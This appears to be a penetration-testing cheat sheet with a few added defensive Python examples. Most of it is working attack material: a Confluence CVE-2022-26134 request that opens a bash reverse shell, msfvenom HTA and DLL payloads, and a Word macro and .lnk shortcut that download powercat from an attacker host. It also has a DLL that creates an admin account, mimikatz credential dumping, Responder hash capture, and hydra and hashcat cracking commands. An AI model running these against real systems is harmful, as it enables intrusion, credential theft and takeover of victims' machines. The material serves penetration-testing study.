- In file uploads, try to upload huge files
- In chat section, try to send big messages and see how the application behaves
- Regular expression Denial of Service - ReDoS
  - search for `RegExp()`
- Long Password DoS Attack (Note: the value of password is hashed and then stored in Databases)
  - Check for length restriction and play with it
  - If there is no restriction, test until the application slows down
  - password.txt
- Long string DoS
- DoS against a victim
  - Sending a reset link might disable a user's account, spam to prevent the user from accessing their account
  - Multiple wrong passwords might disable a user's account
Common API path convention: /api_name/v1
- Create a pattern file
```shell
echo {GOBUSTER}/v1 > patterns
echo {GOBUSTER}/v2 >> patterns
echo {GOBUSTER}/v3 >> patterns
```
- Run the command `gobuster dir -u <TARGET> -w /usr/share/wordlists/wordlist.txt -p patterns`
- Inspect the endpoints found with `curl` and use recursion
CVE-2021-43798: Grafana versions 8.0.0-beta1 through 8.3.0, except for patched versions, are vulnerable to directory traversal
curl --path-as-is http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
- Check also for the sqlite3 database `/var/lib/grafana/grafana.db` and the `conf/defaults.ini` config file
- See: Active Exploitation of Confluence CVE-2022-26134
curl http://<Confluence-IP>:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/<YOUR-IP>/<YOUR-PORT>%200%3E%261%27%29.start%28%29%22%29%7D/
- Run a listener: `nc -nvlp 4444`
Passive Client Information Gathering
- Search with Google, social media and forum websites
- Search for IPs and other sensitive information
- Search for files in the target's websites with `dirsearch` or `gobuster`, retrieve metadata from files with `exiftool -a -u brochure.pdf`
Active Client Information Gathering
- Make direct contact with the target machine or its users
- Interaction with the target: social engineering, requiring the user to click on a link, open an email, run an attachment, or open a document
- Social-Engineer Toolkit (SET)
- Client Fingerprinting
- Fingerprintjs2
  - Change permissions on the `fp` directory with `sudo chown www-data:www-data fp` to make `/fp/js.php` work
  - Parse User Agents
- Use Canarytokens and Social Engineering to retrieve information from a target
- Use Grabify IP Logger
If a file is created with a `.hta` extension rather than a `.html` extension, Internet Explorer will automatically recognize it as an HTML Application and provide the option to run it using the mshta.exe application (still useful since many corporations rely on Internet Explorer).
PoC.hta leveraging ActiveXObjects:
```html
<html>
<head>
<script>
  var c = 'cmd.exe'
  new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>
  self.close();
</script>
</body>
</html>
```
Create a better payload with msfvenom from the Metasploit framework: `sudo msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f hta-psh -o /var/www/html/evil.hta`
In evil.hta you will find a command of the form `powershell.exe -nop -w hidden -e aQBmCgAWBJAG4AdAQAHQAcg...`
- `-nop`: NoProfile
- `-w`: WindowStyle hidden
- `-e`: EncodedCommand
Microsoft Word Macro: To exploit Microsoft Office we need to create a doc in `.docm` or `.doc` format and use macros. An example of the creation of a macro to run a reverse shell is the following.
- From your PowerShell, prepare the command encoded in base64
```powershell
$TEXT = "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1');powercat -c <LHOST> -p <LPORT> -e powershell"
$ENCODED = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($TEXT))
echo $ENCODED
```
- Since VBA has a 255-character limit for literal strings, we have to split the command into multiple lines. You can do it with the following Python script (pass the base64 string as the first argument):
```python
import sys

# Build the full command line and print it as 50-character VBA string chunks
payload = "powershell.exe -nop -w hidden -e " + sys.argv[1]
n = 50
for i in range(0, len(payload), n):
    print('Str = Str + "' + payload[i:i + n] + '"')
```
- This will be the final result:
```vba
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -e H4sIAAb/EF0CA7VWa"
    Str = Str + "2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9YKwwBTj4H"
    Str = Str + "C4Jh0+9/3jg1pqqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj"
    Str = Str + "4ZO6mw4oRa/u5C4GnZvxaMjWK49GhfcB05YKEnSiTcOjpbX1+0"
    Str = Str + "8TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNi"
    ...
    Str = Str + "aNrT16pQqhMQu61/7ZgO989DRWIMdw/Di/NWRyD0Jit8bW7V0f"
    Str = Str + "T2HIOHYs1NZ76MooKEk7y5kGfqUvGvJkOWvJ9aOk0LYm5JYnzt"
    Str = Str + "AUxkne+Miuwtq9HL2vyJW3j8hvLx/Q+z72j/s/hKKslRm/GL9x"
    Str = Str + "4XfwvR3U586mIKgDRcoQYdG/joCJT2efexAVaD2fvmwT9XbnJ4"
    Str = Str + "N4BPo5PhvyjwHqBILAAA="
    CreateObject("Wscript.Shell").Run Str
End Sub
```
- Open the document in Word, go to View > Macros and create a macro with the code generated in the previous step. Select the current document in `Macros in:`
Object Linking and Embedding: another option is to abuse Dynamic Data Exchange (DDE) to execute arbitrary applications from within Office documents (patched since December of 2017)
- Create a batch script to run a reverse shell: `START powershell.exe -nop -w hidden -e <BASE64>`
- Open Microsoft Word > Create a new document > Navigate to the Insert ribbon > Click the Object menu
- Choose "Create from File" tab and select the newly-created batch script
- Change the appearance of the batch file
Evading Protected View: In exactly the same way as Word and Excel, Microsoft Publisher permits embedded objects and ultimately code execution, but it will not enable Protected View for documents that are distributed over the Internet.
Library files consist of three major parts written in XML to specify the parameters for accessing remote locations:
- General library information
- Library properties
- Library locations
- Run a WebDAV share on the attacker machine: `/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/WebDAV/`
- Create the following Windows Library File (`config.Library-ms`) on a Windows machine
```xml
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://IP</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
```
- On a Windows machine, create a shortcut (`automatic_configuration.lnk`) with the following as location: `powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1');powercat -c <IP> -p <PORT> -e powershell"`
- Put `config.Library-ms` and `automatic_configuration.lnk` in the WebDAV directory
- Start the Python3 web server on port `8000` to serve `powercat.ps1`, WsgiDAV for the WebDAV share `/home/kali/webdav`, and a Netcat listener on port `4444`
- Send the library file to the victim and wait for them to execute the shortcut file to get a reverse shell
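From the defender's side, the same XML structure is what you inspect when triaging a suspicious `.Library-ms` attachment. The following is an added example, not part of these notes: it parses a library file and flags search connectors whose location is remote. Both sample documents are constructed here; the remote one mirrors the config.Library-ms above with a documentation address in place of the attacker host.

```python
"""Flag Windows Library files (.Library-ms) whose search connectors point at a
remote location.  Added example, not part of the EasyG notes; the two sample
documents below are constructed."""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

LIB_NS = "http://schemas.microsoft.com/windows/2009/library"
REMOTE_SCHEMES = {"http", "https", "ftp", "dav", "davs", "webdav"}

# Constructed sample: the only location is a WebDAV host reached over HTTP.
REMOTE_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.0.2.10</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed sample of an ordinary library: a known folder plus a local path.
LOCAL_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>C:\\Users\\Public\\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def is_remote(url: str) -> bool:
    """True when the location lives off the local machine: a URL with a
    network scheme, or a UNC path such as \\\\host\\share."""
    if url.startswith("\\\\") or url.startswith("//"):
        return True
    return urlparse(url).scheme.lower() in REMOTE_SCHEMES


def assess_library(xml_text: str) -> dict:
    """Collect every connector location and single out the remote ones.

    default_save_remote is True when a remote location is also the default
    save location, i.e. Explorer would write new files to the remote host."""
    root = ET.fromstring(xml_text)
    locations, remote, default_save_remote = [], [], False
    for conn in root.iter(f"{{{LIB_NS}}}searchConnectorDescription"):
        url_el = conn.find(f"{{{LIB_NS}}}simpleLocation/{{{LIB_NS}}}url")
        if url_el is None or not url_el.text:
            continue
        url = url_el.text.strip()
        locations.append(url)
        if is_remote(url):
            remote.append(url)
            flag = conn.findtext(f"{{{LIB_NS}}}isDefaultSaveLocation", "false")
            if flag.strip().lower() == "true":
                default_save_remote = True
    return {"locations": locations, "remote": remote,
            "default_save_remote": default_save_remote}


if __name__ == "__main__":
    for label, doc in (("remote", REMOTE_LIBRARY), ("local", LOCAL_LIBRARY)):
        print(label, assess_library(doc))
```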
Tool
- Process Monitor to see which DLLs are missing for an exe and do DLL Hijacking
Process
- Use winPEAS to enumerate non-Windows services: `.\winPEASany.exe quiet servicesinfo`
- Enumerate which of these services our user has stop and start access to: `.\accesschk.exe /accepteula -uvqc user <service>`
- Once it's found which service is vulnerable to DLL hijacking, find the executable's path with `sc qc dllsvc`
- Using Process Monitor, add the filters needed to find missing DLLs.
- Generate a reverse shell DLL named hijackme.dll: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o hijackme.dll`
- Run again the vulnerable service: `net stop <service>` and `net start dllsvc`
Another example of a DLL:
```c
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason) {
    case DLL_PROCESS_ATTACH: {
        // Perform initialization tasks for the DLL when it is loaded
        int i;
        i = system("net user eviladmin Ev!lpass /add");
        i = system("net localgroup administrators eviladmin /add");
        break;
    }
    case DLL_PROCESS_DETACH:
        // Perform cleanup tasks for the DLL when it is unloaded
        break;
    case DLL_THREAD_ATTACH:
        // Perform initialization tasks for each new thread that loads the DLL
        break;
    case DLL_THREAD_DETACH:
        // Perform cleanup tasks for each thread that unloads the DLL
        break;
    }
    return TRUE;
}
```
Compile it with `x86_64-w64-mingw32-gcc dllh.cpp --shared -o dllh.dll`
Resources
The application design is based on a two-tier architecture. In particular, the thick client application installed on the workstation communicates directly with a backend DBMS without the use of an application server.
The best option, from a security perspective, is designing and implementing a three-tier architecture in which the thick client connects with an intermediary layer (an application server), which in turn communicates with the database. A secure channel must be used for all communications, with only secure protocols (such as TLS, HTTPS, etc.), and preferably with Certificate Pinning.
If this is not possible, it is desirable to provide read-only users and read/write users distinct privileges at the DBMS layer. This would stop vertical privilege escalation even if a read-only user were to access the database directly and try to edit the data.
Sensitive data exposure, key leakage, broken authentication, insecure sessions, and spoofing attacks can all be caused by improper application of encryption methods. Some hashing or encryption techniques, such as MD5 and RC4, are known to be insecure and are not advised for use.
When dealing with hashing algorithms, the strongest algorithm available should be used (e.g., SHA-512 or at least SHA-256). However, it is always crucial to take into account the precise context in which the hashing algorithm must be used. For instance, when managing passwords it is recommended to use contemporary hashing algorithms that have been created especially for securely storing passwords. This means that they should be slow (as opposed to fast algorithms like MD5 and SHA-1), and that their cost can be configured by changing the work factor (e.g., PBKDF2 or bcrypt).
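An added example, not from these notes, of the storage scheme the paragraph recommends: PBKDF2-HMAC-SHA256 with a per-user salt and a tunable work factor, beside a verify step that recognises legacy unsalted MD5 records and upgrades them on the next successful login. The record layout `$pbkdf2-sha256$<iterations>$<salt>$<hash>` and the `login()` flow are this example's own choices.

```python
"""Salted, slow, work-factor-tunable password storage (PBKDF2-HMAC-SHA256)
with transparent upgrade of legacy unsalted MD5 records.  Added example,
not from the EasyG notes; the record layout is this example's own."""
import base64
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 600_000  # current work factor; raise it as hardware gets faster
PREFIX = "$pbkdf2-sha256$"


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def hash_password(password: str, iterations: int = ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Derive a salted PBKDF2 record; a fresh random salt unless one is given."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{PREFIX}{iterations}${_b64(salt)}${_b64(dk)}"


def verify_password(password: str, record: str) -> Tuple[bool, bool]:
    """Return (matches, needs_rehash).

    needs_rehash is True after a successful match when the stored record is
    a legacy unsalted MD5 digest, or a PBKDF2 record whose work factor is
    below the current one, so the caller can re-store the password."""
    if record.startswith(PREFIX):
        iterations, salt_b64, dk_b64 = record[len(PREFIX):].split("$")
        iterations = int(iterations)
        expected = base64.b64decode(dk_b64)
        actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                     base64.b64decode(salt_b64), iterations)
        ok = hmac.compare_digest(actual, expected)  # constant-time compare
        return ok, ok and iterations < ITERATIONS
    # Anything else is treated as the legacy scheme: hex MD5, no salt.
    legacy = hashlib.md5(password.encode("utf-8")).hexdigest()
    ok = hmac.compare_digest(legacy, record.lower())
    return ok, ok


def login(password: str, record: str) -> Tuple[bool, str]:
    """Check a password and return the record to keep, upgraded when needed."""
    ok, rehash = verify_password(password, record)
    if ok and rehash:
        return True, hash_password(password)
    return ok, record


if __name__ == "__main__":
    stored = hash_password("correct horse battery staple")
    print(stored)
    print(verify_password("correct horse battery staple", stored))
```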
If not configured correctly, the encryption may not be sufficiently secure. An example with AES, an algorithm for symmetric encryption:
- Cipher-Block-Chaining (CBC) is no longer considered safe when verifiable padding has been applied without first ensuring the integrity of the ciphertext, except for very specific circumstances. Implemented this way, it weakens AES encryption.
The memory analysis of an application, done while the thick client process is running, can highlight the presence of secrets in cleartext, which can therefore be extracted by any user with access to the machine where the application is hosted.
Resource
- Process Hacker: helps to dump the exe memory and see what sensitive data is there
Sometimes the thick client application's source code is not obfuscated, therefore a hostile user may decompile it and easily comprehend every functionality of the application. It's also possible that more can be found, like credentials and API keys.
Resources
- VB Decompiler: decompile a VB application
- ILSpy | dnSpy: .NET decompilers
If an application executable, and/or the imported DLLs, has not been digitally signed, it's possible to replace it with a tampered version without the user noticing.
Resource
- Sigcheck: check the signature of an executable
When the client does not verify the TLS certificate presented by the back-end, it's also possible to intercept the HTTPS communications managed by the thick client application.
Without effective certificate control, an attacker who is capable of conducting a Man in the Middle attack can provide a self-signed certificate and the application will accept it, invalidating the protection provided by the TLS connection.
During the SSL/TLS negotiation, SSL/TLS connections may be set up to offer outdated protocols and cipher suites that are susceptible to known security flaws. The data transmitted between the server and the client could potentially be read or modified in this case if an attacker is able to intercept the communication.
Resource
- testssl.sh: useful for checking outdated ciphers & more
If Citrix is present and you have access to it, there are multiple ways you can achieve Remote Code Execution:
- Try to upload a PowerShell
- Search for a functionality that opens a dialog box. Insert the path for `cmd` and `PowerShell` and see if they pop up
- In a dialog box, see if the right-click is allowed. Play with the functionality to achieve RCE, like creating a `.bat` and running it or uploading files
- Upload Process Hacker and see if you find cleartext secrets in memory
Resources
- If it's found that standard users have direct access to the database, there is the possibility for users to read and write data that is not otherwise accessible through the client application.
- If the SQL server requires a Windows user, use the command `runas /user:localadmin <SQL-SERVER-MANAGEMENT-STUDIO>`
- Try access with the account `sa:RPSsql12345`
- Intercept the requests and see if there is an Insecure application design. In that case, it might be possible to perform a Direct database access, SQLi or Remote Code Execution
Resources
A Windows service executable might be configured with insecure permissions. Services configured to use an executable with weak permissions are vulnerable to privilege escalation attacks.
Unprivileged users have the ability to change or replace the executable with arbitrary code, which would then be run the next time the service is launched. This can lead to privilege escalation depending on the user the service is running as.
- Check for classic HTML injections and XSS
- Try to use a `SSID` as a vector for an XSS with a payload like `"/><img src=x onerror=alert(1)>`
- Check if `<webview>` works. If it does, it might be possible to achieve a LFI with a payload like this: `<webview src="file:///etc/passwd"></webview>`. [Reference]
Resources
<# gather information about current user #>
whoami
net user <user>
whoami /priv
<# gather user context information #>
id
<# discover other user accounts on the system #>
net user
<# discover localgroups and users in those groups#>
whoami /groups
net localgroup
net user <username>
PS C:\> Get-LocalGroupMember <group>
<# enumerate the Hostname #>
hostname
<# enumerate the Operating System Version and Architecture #>
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
<# enumerate running processes and services #>
PS C:\> Get-Process
tasklist /SVC
<# enumerate networking information #>
ipconfig /all
route print
netstat -ano
<# enumerate firewall status and rules #>
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
<# enumerate scheduled tasks #>
schtasks /query /fo LIST /v
<# enumerate installed applications and patch levels #>
PS C:\> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
PS C:\> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn
<# enumerate readable/writable files and directories #>
accesschk.exe -uws "Everyone" "C:\Program Files"
PS C:\> Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
<# enumerate unmounted disks #>
mountvol
<# enumerate device drivers and Kernel modules #>
PS C:\> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
PS C:\> Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
<# enumerating binaries that AutoElevate #>
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
<# find interesting files #>
Get-ChildItem -Path <PATH> -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path <PATH> -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path <PATH> -Include *.kdbx,*.txt,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
<# see history of commands #>
Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\Public\Transcripts\transcript01.txt
To use Event Viewer to search for events recorded by Script Block Logging:
- Open the Event Viewer:
- Press Windows key + R to open the Run dialog box.
- Type `eventvwr.msc` and press Enter.
- In the Event Viewer window, expand "Applications and Services Logs"
- Expand the "Microsoft-Windows-PowerShell/Operational" log
- Click on the "Filter Current Log" option on the right-hand side of the window
- In the Filter Current Log dialog box, enter "4104" as the Event ID
- Click on the "OK" button to apply the filter
- The Event Viewer will now display only the events related to Script Block Logging
# enumerate users
cat /etc/passwd
# enumerate the Hostname
hostname
# enumerate the Operating System Version and Architecture
cat /etc/issue
cat /etc/*-release
cat /etc/os-release
uname -a
uname -r
arch
# enumerate running processes and services
ps axu
# enumerate networking information
ip a
/sbin/route
routel
ss -anp
# inspect custom IP tables
cat /etc/iptables/rules.v4
# enumerate scheduled tasks
ls -lah /etc/cron*
cat /etc/crontab
crontab -l
sudo crontab -l
# enumerate installed applications and patch levels
dpkg -l
# find all writable directories
find / -writable -type d 2>/dev/null
# find all writable files in /etc
find /etc -maxdepth 1 -writable -type f
# find all readable files in /etc
find /etc -maxdepth 1 -readable -type f
# enumerate readable/writable files and directories
find / -writable -type d 2> /dev/null
# enumerate unmounted disks
cat /etc/fstab
mount
/bin/lsblk
lsblk
# enumerate device drivers and kernel modules
lsmod
/sbin/modinfo libata
# enumerating binaries that AutoElevate
find / -perm -u=s -type f 2>/dev/null
# find SSH private keys
find / -maxdepth 5 -name .ssh -exec grep -rnw {} -e 'PRIVATE' \; 2> /dev/null
- SecLists
- wordlists.assetnote.io
- content_discovery_all.txt
- OneListForAll
- wordlistgen
- Scavenger
- cewl: `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
Brute Force Wordlists
Crunch, see crunch | Kali Linux Tools.
| Placeholder | Character translation |
|---|---|
| @ | Lower case alpha characters |
| , | Upper case alpha characters |
| % | Numeric characters |
| ^ | Special characters including space |
Examples of usage:
- Structure of the passwords of the target: `[Capital Letter] [2 x lower case letters] [2 x special chars] [3 x numeric]`. Run `crunch 8 8 -t ,@@^^%%%`
- Passwords between four and six characters in length, containing only the characters 0-9 and A-F: `crunch 4 6 0123456789ABCDEF -o crunch.txt`
- Use a pre-defined character-set with `-f` and include `mixalpha` to include all lower and upper case letters: `crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt`
Mutating wordlists
When password policies are implemented, it is helpful to remove the passwords that are guaranteed to fail the policy from the wordlist. Starting from a wordlist called demo.txt:
- `sed -i '/^1/d' demo.txt` removes every line that starts with 1
Many people just append a "1" to the end of an existing password when creating a password with a number value. Create a rule file with $1 that adds a "1" to each password in our wordlist.
- Add a rule for hashcat with `echo \$1 > demo.rule`
Many people have a tendency to capitalize the initial character in a password when they are required to use an upper case character.
- Add a rule with `echo '$1\nc' > demo.rule`
- Note: each line in the file is interpreted as a new rule
For special characters:
- `$1 c $!` to have `Password1!`
- `$! $1 c` to have `Password!1`
Other rules
- Test the rules with `hashcat -r demo.rule --stdout demo.txt`
- `/usr/share/hashcat/rules` in Kali
- See: rule_based_attack [hashcat wiki]
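An added example, not from these notes or from hashcat, that interprets the rule functions used above (`$X` append, `^X` prepend, `c` capitalize, `l` lowercase, `u` uppercase, `:` no-op) so you can check what a rule line such as `$1 c $!` produces and whether the result would even satisfy the password policy in force. The demo word list, the `prune()` filter mirroring the `sed` line, and the policy checker are this example's own constructions.

```python
"""Minimal interpreter for a handful of hashcat rule functions, plus a policy
check for the candidates it produces.  Added example, not from the EasyG
notes or from hashcat; DEMO_WORDS and passes_policy() are constructed."""
import re
from typing import Iterable, List

DEMO_WORDS = ["password", "welcome", "1qaz2wsx", "Summer"]  # constructed


def apply_rule(word: str, rule_line: str) -> str:
    """Apply the space-separated functions of one rule line, left to right."""
    for fn in rule_line.split():
        if fn == ":":                      # no-op: emit the word unchanged
            continue
        if fn == "l":                      # lowercase everything
            word = word.lower()
        elif fn == "u":                    # uppercase everything
            word = word.upper()
        elif fn == "c":                    # capitalize first char, lower the rest
            word = word[:1].upper() + word[1:].lower()
        elif len(fn) == 2 and fn[0] == "$":   # append one character
            word = word + fn[1]
        elif len(fn) == 2 and fn[0] == "^":   # prepend one character
            word = fn[1] + word
        else:
            raise ValueError(f"unsupported rule function: {fn!r}")
    return word


def load_rules(text: str) -> List[str]:
    """Parse rule-file text: one rule per line, '#' comments and blanks skipped."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def mutate(words: Iterable[str], rules: List[str]) -> List[str]:
    """Every rule applied to every word, the candidates a --stdout run lists."""
    return [apply_rule(w, r) for w in words for r in rules]


def prune(words: Iterable[str]) -> List[str]:
    """Same effect as the notes' `sed -i '/^1/d'`: drop entries starting with 1."""
    return [w for w in words if not w.startswith("1")]


def passes_policy(candidate: str, min_len: int = 8) -> bool:
    """Typical corporate policy: min length, upper, lower, digit, special."""
    return (len(candidate) >= min_len
            and re.search(r"[A-Z]", candidate) is not None
            and re.search(r"[a-z]", candidate) is not None
            and re.search(r"[0-9]", candidate) is not None
            and re.search(r"[^A-Za-z0-9]", candidate) is not None)


if __name__ == "__main__":
    rules = load_rules("$1 c $!\n$! $1 c\n")
    for cand in mutate(prune(DEMO_WORDS), rules):
        print(cand, "passes" if passes_policy(cand) else "fails")
```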
Tools
- Note for Linux-based systems: first use the unshadow utility to combine the passwd and shadow files from the compromised system: `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`
- `john -incremental -users:<user list> <file to crack>` pure brute force attack, you can use `-user:<username>` to target a specific user
- `john --show crackme` display the passwords recovered
- `john --wordlist=<custom wordlist file> -rules <file to crack>` dictionary attack, use `-wordlist` instead of `--wordlist=<custom wordlist file>` to use the john default wordlist
- `john hash.txt --format=NT` simple attack to attack NT hashes
- `john --rules --wordlist=<custom wordlist file> hash.txt --format=NT` using password mutation rules
- `john --rules --wordlist=<custom wordlist file> unshadowed.txt`
- To distribute the load and speed up the cracking process (for multi core CPUs)
  - Use the options `--fork=8` and `--node=1-8/16` on the first machine
  - Use the options `--fork=8` and `--node=9-16/16` on the second machine
- Install the tables
- Load a password file with `Load`
- Click on the `Crack` button
- `Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue` search for KeePass database files
- `keepass2john Database.kdbx > keepass.hash` format KeePass database for Hashcat with keepass2john
  - remove `Database:` from `keepass.hash`
- `hashcat -m 13400 keepass.hash wordlist.txt -r hashcat.rule --force` crack the KeePass database hash
  - find the mode of KeePass in Hashcat with `hashcat --help | grep -i "KeePass"`
- Prerequisites: found username, old passwords (or common passwords), password policy and private key `id_rsa`
- `chmod 600 id_rsa` to change the permissions
- `id_rsa` needs a password
  - `ssh2john id_rsa > ssh.hash`
  - remove `id_rsa:`
- For JtR, create a file for the rules in the file `ssh.rule` using the found password policy
  - add `[List.Rules:sshRules]` as the first line of the file
  - add the rules to the JtR config: `sudo sh -c 'cat /home/kali/Downloads/ssh.rule >> /etc/john/john.conf'`
- `john --wordlist=ssh.passwords --rules=sshRules ssh.hash`
- Connect to the ssh service with `ssh -i id_rsa -p <PORT> <user>@<IP>` and insert the found password
Tools
- SSH Brute force: `scanner/ssh/ssh_login`
- `medusa -d` all the protocols medusa can interact with
- `medusa -h <IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin`
  - `-m` htaccess-protected URL
  - `-h` target host
  - `-u` attack the admin user
  - `-P` wordlist file
  - `-M` HTTP authentication scheme
- `crowbar --help`
- `crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1`
  - `-b` specify the protocol
  - `-s` target server
  - `-u` username
  - `-C` wordlist
  - `-n` number of threads
- `sudo hydra`
- `sudo hydra -L users.txt -P pass.txt <service://server> <options>` launch a dictionary attack
- `hydra -L users.txt -P pass.txt telnet://target.server` Telnet example
- `hydra -L users.txt -P pass.txt http-get://target.server` password protected web resource
- Specify a port with `-s <PORT>`
SSH Attack
- `sudo hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1`
  - `-l` specify the target username
  - `-P` specify a wordlist
  - `protocol://IP` to specify the target protocol and IP address respectively
HTTP POST Attack
- `sudo hydra http-form-post -U`
- `sudo hydra -l user -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"`
  - `-l` user name
  - `-P` wordlist
  - `-vV` verbose output
  - `-f` stop the attack when the first successful result is found
  - supply the service module name `http-form-post` and its required arguments `/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN`
Tools
- Sample password hash encoding strings
- hashID
- hash-identifier
- mimikatz
- fgdump
- Credential Editor
- pth-winexe
- Responder.py
Notes
- On most Linux systems, hashed passwords are stored in the `/etc/shadow` file
- On Windows systems, hashed user passwords are stored in the Security Accounts Manager (SAM). Microsoft introduced the SYSKEY feature (Windows NT 4.0 SP3) to deter offline SAM database password attacks
- Windows NT-based systems, up to and including Windows 2003, store two different password hashes: LAN Manager (LM) (DES based) and NT LAN Manager (NTLM), which uses MD4 hashing
- From Windows Vista on, the operating system disables LM by default and uses NTLM
- In Windows, get all local users in PowerShell with `Get-LocalUser`
- hash-identifier
- hashid: `hashid <HASH>`
- Hash Analyzer - TunnelsUP
`C:\Programs\mimikatz.exe`
- `privilege::debug` enables the SeDebugPrivilege access right required to tamper with another process
- `token::elevate` elevate the security token from high integrity (administrator) to SYSTEM integrity
- `lsadump::sam` dump the contents of the SAM database
- Identify the local users with `Get-LocalUser`
- Run `mimikatz.exe` as an administrator
- Use the command `privilege::debug` to have the `SeDebugPrivilege` access right enabled
- Use the command `token::elevate` to elevate to SYSTEM user privileges
- Extract passwords from the system
  - `sekurlsa::logonpasswords` attempts to extract plaintext passwords and password hashes from all available sources
  - `lsadump::sam` extracts the NTLM hashes from the SAM
- Run `hashcat --help | grep -i "ntlm"` to retrieve the correct hash mode, then `hashcat -m 1000 user.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force`
Capture a Net-NTLMv2 hash
- `ip a` retrieve a list of all interfaces
- `sudo responder -I <interface>`
- Wait for a connection, capture the hash and save it as `user.hash`
Crack the Net-NTLMv2 hash
- `hashcat --help | grep -i "ntlm"`
- `hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt --force`
Relaying Net-NTLMv2
